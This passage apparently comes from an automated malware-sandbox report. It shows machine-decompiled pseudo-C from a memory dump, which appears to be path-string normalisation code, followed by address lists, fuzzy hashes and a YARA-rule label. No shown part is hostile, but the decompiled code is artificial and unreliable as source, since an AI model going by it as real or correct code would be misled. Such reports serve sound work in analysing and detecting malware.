																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01AB4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E01A3D130(_t427, _t494, _t511);
				}
			}

0x01ab5ba5
0x01ab5baa
0x01ab5baf
0x01ab5bb4
0x01ab5bb6
0x01ab5bbc
0x01ab5bbe
0x01ab5bc4
0x01ab5bcd
0x01ab5bd3
0x01ab5bd6
0x01ab5bdc
0x01ab5be0
0x01ab5be3
0x01ab5beb
0x01ab5bf2
0x01ab5bf8
0x01ab5bfe
0x01ab5c04
0x01ab5c0e
0x01ab5c18
0x01ab5c1f
0x01ab5c25
0x01ab5c2a
0x01ab5c2c
0x01ab5c32
0x01ab5c3a
0x01ab5c3f
0x01ab5c42
0x01ab5c48
0x01ab5c5b
0x01ab5c5b
0x01ab5c2c
0x01ab5cb7
0x01ab5cb9
0x01ab5cbf
0x01ab5cc2
0x01ab5cca
0x01ab5ccb
0x01ab5ccb
0x01ab5cd1
0x01ab5cd7
0x01ab5cda
0x01ab5ce1
0x01ab5ce4
0x01ab5ce7
0x01ab5ced
0x01ab5cf3
0x01ab5cf9
0x01ab5cff
0x01ab5d08
0x01ab5d0a
0x01ab5d0e
0x01ab5d10
0x00000000
0x00000000
0x01ab5d16
0x01ab5d1a
0x00000000
0x00000000
0x01ab5d20
0x01ab5d22
0x01ab5d25
0x01ab5d2f
0x01ab5d2f
0x01ab5d33
0x01ab5d3d
0x01ab5d49
0x01ab5d4b
0x00000000
0x00000000
0x01ab5d5a
0x01ab5d5d
0x01ab5d60
0x00000000
0x00000000
0x01ab5d66
0x01ab5d69
0x00000000
0x00000000
0x01ab5d6f
0x01ab5d6f
0x01ab5d73
0x01ab5d79
0x01ab5d7f
0x01ab5d86
0x01ab5d95
0x01ab5d98
0x01ab5dba
0x01ab5dcb
0x01ab5dce
0x01ab5dd3
0x01ab5dd6
0x01ab5dd8
0x01ab5de6
0x01ab5dec
0x01ab5dee
0x01ab5df1
0x01ab5df3
0x01ab635a
0x01ab635a
0x00000000
0x01ab635a
0x01ab5dfe
0x01ab5e02
0x01ab5e05
0x01ab5e07
0x01ab5e10
0x01ab5e13
0x01ab5e1b
0x01ab5e1c
0x01ab5e21
0x01ab5e22
0x01ab5e23
0x01ab5e25
0x01ab5e2a
0x01ab5e2c
0x01ab5e2e
0x01ab5e36
0x01ab5e39
0x01ab5e42
0x01ab5e47
0x01ab5e4d
0x01ab5e54
0x01ab5e54
0x01ab5e54
0x01ab5e2e
0x01ab5e5c
0x01ab5e5f
0x01ab5e62
0x01ab5e64
0x01ab5e6b
0x01ab5e70
0x01ab5e7a
0x01ab5e7a
0x01ab5e7a
0x01ab5e6b
0x01ab5e7e
0x01ab5e7f
0x01ab5e7f
0x01ab5e81
0x01ab5e87
0x01ab5e8b
0x01ab5e8c
0x01ab5e8c
0x01ab5e8c
0x01ab5e9a
0x01ab5e9c
0x01ab5ea2
0x01ab5ea6
0x01ab5f50
0x01ab5f50
0x01ab5f57
0x01ab5f66
0x01ab5f66
0x01ab5f66
0x01ab5f68
0x01ab5f6a
0x01ab63d0
0x00000000
0x01ab5f70
0x01ab5f70
0x01ab5f91
0x01ab5f9c
0x01ab5f9e
0x01ab5fa4
0x01ab5fa6
0x01ab638c
0x01ab6392
0x01ab63a1
0x01ab63a7
0x01ab63af
0x01ab63af
0x01ab63bd
0x01ab63d8
0x00000000
0x01ab63d8
0x01ab5fac
0x01ab5fb2
0x01ab5fb4
0x01ab5fbd
0x01ab5fc6
0x01ab5fce
0x01ab5fd4
0x01ab5fdc
0x01ab5fec
0x01ab5fed
0x01ab5fee
0x01ab5fef
0x01ab5ff9
0x01ab5ffa
0x01ab5ffb
0x01ab5ffc
0x01ab6000
0x01ab6004
0x01ab6012
0x01ab6012
0x01ab6018
0x01ab6019
0x01ab601a
0x01ab601b
0x01ab601c
0x01ab6020
0x01ab6059
0x01ab605c
0x01ab6061
0x01ab6061
0x01ab6022
0x01ab6022
0x01ab6022
0x01ab6025
0x01ab602a
0x01ab602b
0x01ab6031
0x01ab6037
0x01ab6038
0x01ab603e
0x01ab6048
0x01ab6049
0x01ab604a
0x01ab604b
0x01ab604c
0x01ab604d
0x01ab6053
0x01ab6054
0x01ab6054
0x01ab6062
0x01ab6065
0x01ab6067
0x01ab606a
0x01ab6070
0x01ab6075
0x01ab6076
0x01ab6081
0x01ab6087
0x01ab6095
0x01ab6099
0x01ab609e
0x01ab60a4
0x01ab60ae
0x01ab60b0
0x01ab60b3
0x01ab60b6
0x01ab60b8
0x01ab60ba
0x01ab60ba
0x01ab60ba
0x01ab60ba
0x01ab60be
0x01ab60c0
0x01ab60c5
0x01ab60c5
0x01ab60c5
0x01ab60c6
0x01ab60cd
0x01ab6114
0x01ab60cf
0x01ab60cf
0x01ab60d4
0x01ab60d5
0x01ab60da
0x01ab60db
0x01ab60e1
0x01ab60e2
0x01ab60e8
0x01ab60f8
0x01ab60fd
0x01ab60fe
0x01ab6102
0x01ab6104
0x01ab6107
0x01ab6109
0x01ab610b
0x01ab610b
0x01ab610b
0x01ab610b
0x01ab610f
0x01ab610f
0x01ab6117
0x01ab611a
0x01ab611f
0x01ab6125
0x01ab6134
0x01ab6139
0x01ab613f
0x01ab6146
0x01ab6148
0x01ab614b
0x01ab614d
0x01ab614f
0x01ab614f
0x01ab614f
0x01ab614f
0x01ab6153
0x01ab6159
0x01ab6159
0x01ab615c
0x01ab6163
0x01ab6169
0x01ab616c
0x01ab6172
0x01ab6181
0x01ab6186
0x01ab6187
0x01ab618b
0x01ab6191
0x01ab6195
0x01ab61a3
0x01ab61bb
0x01ab61c0
0x01ab61c3
0x01ab61cc
0x01ab61d0
0x01ab61dc
0x01ab61de
0x01ab61e1
0x01ab61e4
0x01ab61e6
0x01ab61e8
0x01ab61e8
0x01ab61e8
0x01ab61e8
0x01ab61e6
0x01ab61ec
0x01ab61f3
0x01ab6203
0x01ab6209
0x01ab620a
0x01ab6216
0x01ab621d
0x01ab6227
0x01ab6241
0x01ab6246
0x01ab624c
0x01ab6257
0x01ab6259
0x01ab625c
0x01ab625e
0x01ab6260
0x01ab6260
0x01ab6260
0x01ab6260
0x01ab625e
0x01ab6264
0x01ab6267
0x01ab6269
0x01ab6315
0x01ab6315
0x01ab631b
0x01ab631e
0x01ab6324
0x01ab6327
0x01ab632f
0x01ab6330
0x01ab6333
0x01ab633a
0x01ab633c
0x01ab6335
0x01ab6335
0x01ab6335
0x01ab633f
0x01ab6342
0x01ab634c
0x01ab6352
0x01ab6355
0x01ab6355
0x01ab6359
0x00000000
0x01ab626f
0x01ab6275
0x01ab6275
0x01ab6278
0x01ab627e
0x01ab627e
0x01ab6281
0x01ab6287
0x01ab628d
0x01ab6298
0x01ab629c
0x01ab62a2
0x01ab629e
0x01ab629e
0x01ab629e
0x01ab62a7
0x01ab62a7
0x01ab62aa
0x01ab62b0
0x01ab62f0
0x01ab62f0
0x01ab62f2
0x01ab62f8
0x01ab62fd
0x01ab62b2
0x01ab62b2
0x01ab62b2
0x01ab62b5
0x01ab62dd
0x01ab62e2
0x01ab62e5
0x01ab62b7
0x01ab62b8
0x01ab62bb
0x01ab62bd
0x01ab62c0
0x01ab62c4
0x01ab62cd
0x01ab62cd
0x01ab62c0
0x01ab62bb
0x01ab62b5
0x01ab6302
0x01ab6303
0x01ab6305
0x01ab6305
0x01ab6305
0x01ab630c
0x01ab630c
0x00000000
0x01ab627e
0x01ab6269
0x01ab5eac
0x01ab5ebb
0x01ab5ebe
0x01ab5ecb
0x01ab5ecb
0x01ab5ece
0x01ab5ece
0x01ab5ed4
0x01ab5ed7
0x01ab5ed9
0x01ab5edb
0x01ab5edb
0x01ab5ee1
0x01ab5ee1
0x01ab5ee3
0x01ab5f20
0x01ab5f20
0x01ab5ee5
0x01ab5ee5
0x01ab5ee5
0x01ab5ee8
0x01ab5f11
0x01ab5f18
0x01ab5eea
0x01ab5eea
0x01ab5eed
0x01ab5ef2
0x01ab5ef8
0x01ab5efb
0x01ab5f0a
0x01ab5f0a
0x01ab5eed
0x01ab5ee8
0x01ab5f22
0x01ab5f28
0x00000000
0x00000000
0x01ab5f30
0x01ab5f31
0x01ab5f37
0x01ab5f3a
0x01ab5f3d
0x01ab5f44
0x00000000
0x00000000
0x00000000
0x01ab5f46
0x01ab5f48
0x01ab5f4d
0x00000000
0x01ab5f4d
0x01ab5dda
0x01ab5ddf
0x00000000
0x01ab5ddf
0x01ab5dd8
0x01ab5da7
0x01ab5da9
0x01ab5dac
0x01ab5dae
0x00000000
0x01ab5db4
0x01ab5db4
0x00000000
0x01ab5db4
0x01ab5dae
0x01ab5d88
0x01ab5d8d
0x01ab6363
0x01ab6369
0x01ab636a
0x01ab6370
0x01ab6372
0x01ab637a
0x01ab637b
0x01ab637d
0x00000000
0x00000000
0x01ab637f
0x01ab6385
0x00000000
0x01ab6385
0x01ab5d38
0x01ab5d3b
0x00000000
0x00000000
0x00000000
0x01ab5d3b
0x01ab5d27
0x01ab5d29
0x00000000
0x00000000
0x00000000
0x01ab6360
0x00000000
0x01ab6360
0x01ab5c10
0x01ab5c10
0x01ab63da
0x01ab63e5
0x01ab63e5

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70dba64be676b28be33980d59a74a92f22414ea2a9ed6ce473006e755bfd3b22
Instruction ID: 7c6c6662cab3b0b49ad99060db7064e15a91ae18c204f640db206b5d90feaf8c
Opcode Fuzzy Hash: 70dba64be676b28be33980d59a74a92f22414ea2a9ed6ce473006e755bfd3b22
Instruction Fuzzy Hash: BD425975E01269CFDB24CF68C880BE9BBB5FF49304F1481AAD94DAB242E7359985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A06E30, Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E01A06E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x1abfca8);
				_push(0x1a317f0);
				_push( *[fs:0x0]);
				_t312 =  *0x1add360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E01A2FA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E01A074C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E01A19BC6( &_v52, 0x19c1080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E01A29377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E01A646A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M01A0749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E019E52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L019F2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L019F2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L01A64735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E01A2BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E01A12010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L01A64658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E01A19BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E019E52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L019E83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E019E52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L019E83AE(_t428);
														L80:
														E01A19BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x19c1080;
														_v72 =  *0x19c1080;
														__eax =  *0x19c1084;
														_v68 =  *0x19c1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E01A19BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E01A0746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E01A2B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
